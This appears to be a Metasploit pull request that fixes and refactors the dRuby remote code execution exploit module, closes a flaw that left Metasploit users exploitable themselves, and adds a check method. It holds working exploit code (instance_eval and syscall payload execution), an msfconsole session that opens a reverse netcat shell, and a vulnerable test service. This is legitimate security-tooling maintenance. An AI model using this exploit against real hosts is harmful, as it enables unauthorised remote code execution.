### PR TITLE
Fixes and updates for the DRuby RCE module

### DIFF
--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -79,11 +79,12 @@ class MetasploitModule < Msf::Exploit::Remote
       # syscall open
       i =  p.send(:syscall, 8, filename, 0700)
       # syscall write
-      p.send(:syscall, 4, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      p.send(:syscall, 4, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11)
       # syscall close
       p.send(:syscall, 6, i)
       # syscall fork
       p.send(:syscall, 2)
+      sleep 2
       # syscall execve
       p.send(:syscall, 11, filename, 0, 0)
       print_status("attempting x86 execve of #{filename}")
@@ -93,11 +94,12 @@ class MetasploitModule < Msf::Exploit::Remote
       # syscall creat
       i = p.send(:syscall, 85, filename, 0700)
       # syscall write
-      p.send(:syscall, 1, i, "#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
+      p.send(:syscall, 1, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11)
       # syscall close
       p.send(:syscall, 3, i)
       # syscall fork
       p.send(:syscall, 57)
+      sleep 2
       # syscall execve
       p.send(:syscall, 59, filename, 0, 0)
       print_status("attempting x64 execve of #{filename}")

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -12,46 +12,51 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Distributed Ruby Remote Code Execution',
-      'Description'    => %q{
-        This module exploits remote code execution vulnerabilities in dRuby.
-      },
-      'Author'         => [ 'joernchen <joernchen[at]phenoelit.de>' ], #(Phenoelit)
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
-          [ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],
-          [ 'URL', 'http://bugkraut.de/posts/tainting' ]
-        ],
-      'Privileged'     => false,
-      'Payload'        =>
-        {
-          'DisableNops' => true,
-          'Space'       => 32768,
+    super(
+      update_info(
+        info,
+        'Name' => 'Distributed Ruby Remote Code Execution',
+        'Description' => %q{
+          This module exploits remote code execution vulnerabilities in dRuby.
         },
-      'Platform'       => 'unix',
-      'Arch'           => ARCH_CMD,
-      'Targets'        => [
-        ['Automatic', { method: 'auto'}],
-        ['Trap',      { method: 'trap'}],
-        ['Eval',      { method: 'instance_eval'}],
-        ['Syscall',   { method: 'syscall'}],
-      ],
-      'DisclosureDate' => '2011-03-23',
-      'DefaultTarget' => 0))
+        'Author' => [ 'joernchen <joernchen[at]phenoelit.de>' ], # (Phenoelit)
+        'License' => MSF_LICENSE,
+        'References' =>
+          [
+            [ 'URL', 'http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html' ],
+            [ 'URL', 'http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/' ],
+            [ 'URL', 'http://bugkraut.de/posts/tainting' ]
+          ],
+        'Privileged' => false,
+        'Payload' =>
+          {
+            'DisableNops' => true,
+            'Space' => 32768
+          },
+        'Platform' => 'unix',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          ['Automatic', { method: 'auto' }],
+          ['Trap', { method: 'trap' }],
+          ['Eval', { method: 'instance_eval' }],
+          ['Syscall', { method: 'syscall' }],
+        ],
+        'DisclosureDate' => '2011-03-23',
+        'DefaultTarget' => 0
+      )
+    )
 
-      register_options(
-        [
-          Opt::RHOST,
-          Opt::RPORT(8787)
-        ])
+    register_options(
+      [
+        Opt::RHOST,
+        Opt::RPORT(8787)
+      ]
+    )
   end
 
   def method_trap(p)
     p.send(:trap, 23,
-      :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
+           :"class Object\ndef my_eval(str)\nsystem(str.untaint)\nend\nend")
     # Decide if this is running on an x86 or x64 target, using the kill(2) syscall
     begin
       pid = p.send(:syscall, 20)
@@ -65,11 +70,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def method_instance_eval(p)
-    p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")
+    p.send(:instance_eval, "Kernel.fork { `#{payload.encoded}` }")
   end
 
   def method_syscall(p)
-    filename = "." + Rex::Text.rand_text_alphanumeric(16)
+    filename = '.' + Rex::Text.rand_text_alphanumeric(16)
 
     begin
       # Decide if this is running on an x86 or x64 target.
@@ -77,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # or writev on x64, which will fail due to missing args.
       j = p.send(:syscall, 20)
       # syscall open
-      i =  p.send(:syscall, 8, filename, 0700)
+      i = p.send(:syscall, 8, filename, 0o700)
       # syscall write
       p.send(:syscall, 4, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11)
       # syscall close
@@ -92,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # likely x64
     rescue Errno::EBADF
       # syscall creat
-      i = p.send(:syscall, 85, filename, 0700)
+      i = p.send(:syscall, 85, filename, 0o700)
       # syscall write
       p.send(:syscall, 1, i, "#!/bin/sh\n#{payload.encoded}\n", payload.encoded.length + 11)
       # syscall close
@@ -138,14 +143,14 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
 
-    #DRb.start_service  # this is unnecessary
+    # DRb.start_service  # this is unnecessary
     p = DRbObject.new_with_uri(serveruri)
     class << p
       undef :send
     end
 
     if target[:method] == 'auto'
-      methods = %w{ instance_eval syscall trap }
+      methods = %w[instance_eval syscall trap]
     else
       methods = [target[:method]]
     end
@@ -153,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Remote
     methods.each do |method|
       begin
         print_status("Trying to exploit #{method} method")
-        send("method_" + method, p)
+        send('method_' + method, p)
         handler(nil)
         break
       rescue SecurityError, DRb::DRbConnError, NoMethodError

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Remote
       serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
     end
 
-    DRb.start_service
+    #DRb.start_service  # this is unnecessary
     p = DRbObject.new_with_uri(serveruri)
     class << p
       undef :send

--- a/modules/exploits/linux/misc/drb_remote_codeexec.rb
+++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(update_info(info,
@@ -43,8 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       register_options(
         [
-          OptString.new('URI', [false, "The URI of the target host (druby://host:port) (overrides RHOST/RPORT)", nil]),
-          Opt::RHOST(nil, false),
+          Opt::RHOST,
           Opt::RPORT(8787)
         ])
   end
@@ -108,23 +108,35 @@ class MetasploitModule < Msf::Exploit::Remote
     register_file_for_cleanup(filename) if filename
   end
 
+  def rhost
+    datastore['RHOST']
+  end
+
+  def check
+    begin
+      pid = p.send(:syscall, 20)
+    rescue Errno::EBADF
+      # 64 bit system
+      pid = p.send(:syscall, 39)
+    rescue SecurityError, DRb::DRbConnError, NoMethodError
+      return CheckCode::Safe
+    end
+    vprint_status("Service detected, syscall responded from pid #{pid}")
+
+    val1 = rand(0xffff)
+    val2 = rand(0xffff)
+    begin
+      result = p.send(:instance_eval, "#{val1} + #{val2}")
+    rescue SecurityError, DRb::DRbConnError, NoMethodError
+    end
+
+    return CheckCode::Vulnerable if result == val1 + val2
+
+    CheckCode::Detected
+  end
+
   def exploit
-    if !datastore['URI'].blank? && !datastore['RHOST'].blank?
-      print_error("URI and RHOST are specified, unset one")
-      return
-    end
-
-    if datastore['URI'].blank? && datastore['RHOST'].blank?
-      print_error("neither URI nor RHOST are specified, set one")
-      return
-    end
-
-    unless datastore['URI'].blank?
-      serveruri = datastore['URI']
-      (datastore['RHOST'], datastore['RPORT']) = serveruri.sub(/druby:\/\//i, '').split(':')
-    else
-      serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
-    end
+    serveruri = "druby://#{datastore['RHOST']}:#{datastore['RPORT']}"
 
     #DRb.start_service  # this is unnecessary
     p = DRbObject.new_with_uri(serveruri)
@@ -133,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if target[:method] == 'auto'
-      methods = ["instance_eval", "syscall", "trap"]
+      methods = %w{ instance_eval syscall trap }
     else
       methods = [target[:method]]
     end


### PR DESCRIPTION
By far the most important change this PR makes is in commit 49145bf. This fixes a security issue whereby a user who has run the `exploit/linux/misc/drb_remote_codeexec` is vulnerable to it themselves. This was issue was privately reported to the Metasploit project through our [vulnerability disclosure](https://github.com/rapid7/metasploit-framework/blob/master/.github/SECURITY.md) process. All credit to Jeff Dileo of NCC Group for reporting this vulnerability.

While testing this vulnerability I found that we could simply remove the affected service in question. Prior to this patch, a new instance of the service would be started each time the module was executed. Only one DRuby service instance is necessary to be vulnerable but either way this is a leak that should be addressed. After removing the service I tested each of the targets to ensure that none were dependent on it which led me to issues with the syscall target. The explicit delay between the fork and exec was enough to fix this for me. With this in place the default/instance_eval target and syscall targets are working for me. The trap target did not work for me before or after this patch, so that's still an outstanding issue from what I can tell.

I also added a check method. This can be used to check for vulnerable instances of DRuby services, both from Metasploit and otherwise.

## Verification

List the steps needed to make sure this thing works

- [x] Start a target server, using the **client.rb** script below
    * No seriously, use the client, the server runs but for reasons I haven't identified it's not vulnerable to exploitation because the MSF module's methods don't work.
    - [x] Once the client is running (use `ruby client.rb`), use the PID it prints out to find TCP ports that it's listening on. There should be a high port that's used for the DRuby service. Note this port down, it'll be used for the rest of testing. Don't hit enter so it stays running.
- [x] Validate that the patch fixes the vulnerability
    - [x] **Optionally** reproduce the original issue
        - [x] Start a vulnerable (unpatched) instance of `msfconsole`
        - [x] Set the options as appropriate to target the **client.rb** instance and run the exploit, get a shell using the Autotomatic / Eval target
        - [x] Get the PID of Metasploit using `irb -e "puts 'msfconsole pid: ' + Process.pid.to_s"`
        - [x] Find the high port that Metasploit has opened, ignore the port used by the session if you left that open.
        - [x] Set the RHOST and RPORT options to target Metasploit and run the exploit again, get a shell :frowning: 
    - [x] Start a patched instance of `msfconsole`
    - [x] Set the options as appropriate to target the **client.rb** instance and run the exploit, get a shell using the Autotomatic / Eval target
    - [x] Get the PID of Metasploit using `irb -e "puts 'msfconsole pid: ' + Process.pid.to_s"`
    - [x] See there are no open services opened by Metasploit, ignore the port used by the session if you left that open. :smile: 
- [x] Test the check method
    - [x] Targeting the client.rb script as privously described, it should be identified as vulnerable

## Example

In the following example, the address of the machine running Metasploit is 192.168.159.128

```
msf6 exploit(linux/misc/drb_remote_codeexec) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 exploit(linux/misc/drb_remote_codeexec) > set RPORT 36711
RPORT => 36711
msf6 exploit(linux/misc/drb_remote_codeexec) > set LHOST 192.168.159.128 
LHOST => 192.168.159.128
msf6 exploit(linux/misc/drb_remote_codeexec) > set TARGET Automatic 
TARGET => Automatic
msf6 exploit(linux/misc/drb_remote_codeexec) > show options 

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.159.128  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   36711            yes       The target port


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(linux/misc/drb_remote_codeexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Trying to exploit instance_eval method
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.128:54266) at 2020-10-22 13:06:11 -0400

id
uid=1000(smcintyre)...
^C
Abort session 1? [y/N]  y

[*] 192.168.159.128 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(linux/misc/drb_remote_codeexec) > irb -e "puts 'msfconsole pid: ' + Process.pid.to_s"
msfconsole pid: 50417
msf6 exploit(linux/misc/drb_remote_codeexec) > sudo netstat -antp | grep 50417
[*] exec: sudo netstat -antp | grep 50417

[sudo] password for smcintyre: 
tcp        0      0 127.0.0.1:49710         127.0.0.1:5432          ESTABLISHED 50417/ruby          
tcp        0      0 192.168.159.128:34208   192.168.159.128:36711   ESTABLISHED 50417/ruby          
tcp        0      0 127.0.0.1:49704         127.0.0.1:5432          ESTABLISHED 50417/ruby          
tcp        0      0 127.0.0.1:49718         127.0.0.1:5432          ESTABLISHED 50417/ruby          
msf6 exploit(linux/misc/drb_remote_codeexec) > check
[+] 192.168.159.128:36711 - The target is vulnerable.
msf6 exploit(linux/misc/drb_remote_codeexec) > set RPORT 8787
RPORT => 8787
msf6 exploit(linux/misc/drb_remote_codeexec) > check
[+] 192.168.159.128:8787 - The target is vulnerable.
msf6 exploit(linux/misc/drb_remote_codeexec) >
```

## Resources
The following two scripts helped me through this process. The originals came from the [Ruby 2.7.1 Documentation](https://ruby-doc.org/stdlib-2.7.1/libdoc/drb/rdoc/DRb.html).

<details>
<summary>DRuby Client</summary>

```ruby
require 'drb/drb'

SERVER_URI="druby://localhost:8787"

DRb.start_service


puts "running in pid: #{Process.pid}"
puts "press enter to continue"
gets

log_service=DRbObject.new_with_uri(SERVER_URI)

["loga", "logb", "logc"].each do |logname|

    logger=log_service.get_logger(logname)

    logger.log("Hello, world!")
    logger.log("Goodbye, world!")
    logger.log("=== EOT ===")

end
```
</details>

<details>
<summary>DRuby Server</summary>

```
require 'drb/drb'

URI="druby://localhost:8787"

class Logger

    # Make dRuby send Logger instances as dRuby references,
    # not copies.
    include DRb::DRbUndumped

    def initialize(n, fname)
        @name = n
        @filename = fname
    end

    def log(message)
        File.open(@filename, "a") do |f|
            f.puts("#{Time.now}: #{@name}: #{message}")
        end
    end

end

# We have a central object for creating and retrieving loggers.
# This retains a local reference to all loggers created.  This
# is so an existing logger can be looked up by name, but also
# to prevent loggers from being garbage collected.  A dRuby
# reference to an object is not sufficient to prevent it being
# garbage collected!
class LoggerFactory

    def initialize(bdir)
        @basedir = bdir
        @loggers = {}
    end

    def get_logger(name)
        if !@loggers.has_key? name
            # make the filename safe, then declare it to be so
            fname = name.gsub(/[.\/\\:]/, "_")
            @loggers[name] = Logger.new(name, @basedir + "/" + fname)
        end
        return @loggers[name]
    end

end

Dir.mkdir("/tmp/dlog") unless File.exist?("/tmp/dlog")
FRONT_OBJECT=LoggerFactory.new("/tmp/dlog")

DRb.start_service(URI, FRONT_OBJECT)
DRb.thread.join
```